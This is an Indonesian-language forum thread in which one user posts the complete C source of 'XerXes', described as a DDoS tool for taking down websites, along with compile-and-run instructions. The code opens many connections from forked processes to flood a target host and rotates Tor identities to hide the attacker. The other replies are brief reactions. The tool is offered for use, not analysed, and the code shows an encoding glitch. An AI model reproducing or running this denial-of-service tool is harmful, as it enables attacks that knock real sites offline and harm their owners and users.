Home General Computer Multimedia Business Lounge
|
Tutor 4 in one
|
|
03-29-2013, 06:03 PM
|
|||
|
|||
RE: 4 in one
mantap bro
|
|||
|
04-01-2013, 03:36 PM
(This post was last modified: 04-01-2013 03:36 PM by fata.)
|
|||
|
|||
|
RE: 4 in one
goba liat ini......
kali ini, mumpung gudang script qu penuh :v aq share ini aja dehh Big Grin lumayan buat nambah ilmu om2 :v xixixiixixii :3 Xerxes : adalah powerfull tool ddos yang dipake om the j3st3r buat takedown wep2 yang bikin jengkel Big Grin untuk scriptnya, comod disini om2 :v Klik untuk: /* XerXes - By Th3j3st3r */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdint.h> #include <unistd.h> #include <netdb.h> #include <signal.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <arpa/inet.h> int make_socket(char *host, char *port) { struct addrinfo hints, *servinfo, *p; int sock, r; // fprintf(stderr, "[Connecting -> %s:%s\n", host, port); memset(&hints, 0, sizeof(hints)); hints.ai_family = AF_UNSPEC; hints.ai_socktype = SOCK_STREAM; if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) { fprintf(stderr, "getaddrinfo: %s\n", gai_strerrorĀ®); exit(0); } for(p = servinfo; p != NULL; p = p->ai_next) { if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) { continue; } if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) { close(sock); continue; } break; } if(p == NULL) { if(servinfo) freeaddrinfo(servinfo); fprintf(stderr, "No connection could be made\n"); exit(0); } if(servinfo) freeaddrinfo(servinfo); fprintf(stderr, "[Connected -> %s:%s]\n", host, port); return sock; } void broke(int s) { // do nothing } #define CONNECTIONS 8 #define THREADS 48 void attack(char *host, char *port, int id) { int sockets[CONNECTIONS]; int x, g=1, r; for(x=0; x!= CONNECTIONS; x++) sockets[x]=0; signal(SIGPIPE, &broke); while(1) { for(x=0; x != CONNECTIONS; x++) { if(sockets[x] == 0) sockets[x] = make_socket(host, port); r=write(sockets[x], "\0", 1); if(r == -1) { close(sockets[x]); sockets[x] = make_socket(host, port); } else // fprintf(stderr, "Socket[%i->%i] -> %i\n", x, sockets[x], r); fprintf(stderr, "[%i: Voly Sent]\n", id); } fprintf(stderr, "[%i: Voly Sent]\n", id); usleep(300000); } } void cycle_identity() { int r; int socket = make_socket("localhost", "9050"); write(socket, "AUTHENTICATE \"\"\n", 16); while(1) { r=write(socket, "signal NEWNYM\n\x00", 16); fprintf(stderr, "[%i: cycle_identity -> signal NEWNYM\n", r); usleep(300000); } } int main(int argc, char **argv) { int x; if(argc !=3) cycle_identity(); for(x=0; x != THREADS; x++) { if(fork()) attack(argv[1], argv[2], x); usleep(200000); } getc(stdin); return 0; } Cara Pake : copy script diatas, trus paste di new file... save as xerxes.c lalu compile pake terminal : Code: gcc -c xerxes.c nanti muncul xerxes.o tinggal compile lagi om2 Big Grin Code: gcc xerxes.o -o xerxes nahh, muncul xerxes .. tinggal di execute aja Big Grin Code: ./xerxes selesai Smile xixixixixii.. Note : - kalo gagal buka, brarti masih ada module yang kurang di Linux/Ubuntu/Backtrack yang belum terpasang Smile - untuk modulenya, ketik aja di terminal : Code: apt-cache search openssl apt-cache search socket - kalo udah ada/lengkap module2nya.. tinggal compile ulang om2 :3 xiixixixixii :v |
|||
|
04-01-2013, 03:45 PM
|
|||
|
|||
|
RE: 4 in one
Apaan nihh
|
|||
|
04-01-2013, 03:48 PM
(This post was last modified: 04-01-2013 03:52 PM by facl3ss.)
|
|||
|
|||
RE: 4 in one
(05-29-2011 12:18 PM)qball006_error Wrote: om@fata, maksudnya apa...
|
|||
|
05-22-2013, 08:13 PM
|
|||
|
|||
RE: 4 in one
![]() (04-01-2013 03:48 PM)facl3ss Wrote:(05-29-2011 12:18 PM)qball006_error Wrote: makasih om hehhe
|
|||
|
« Next Oldest | Next Newest »
|
| Topic Tools | ||||||
| ||||||
| Users Browsing |
| 1 Guest(s) |



mantap bro



om






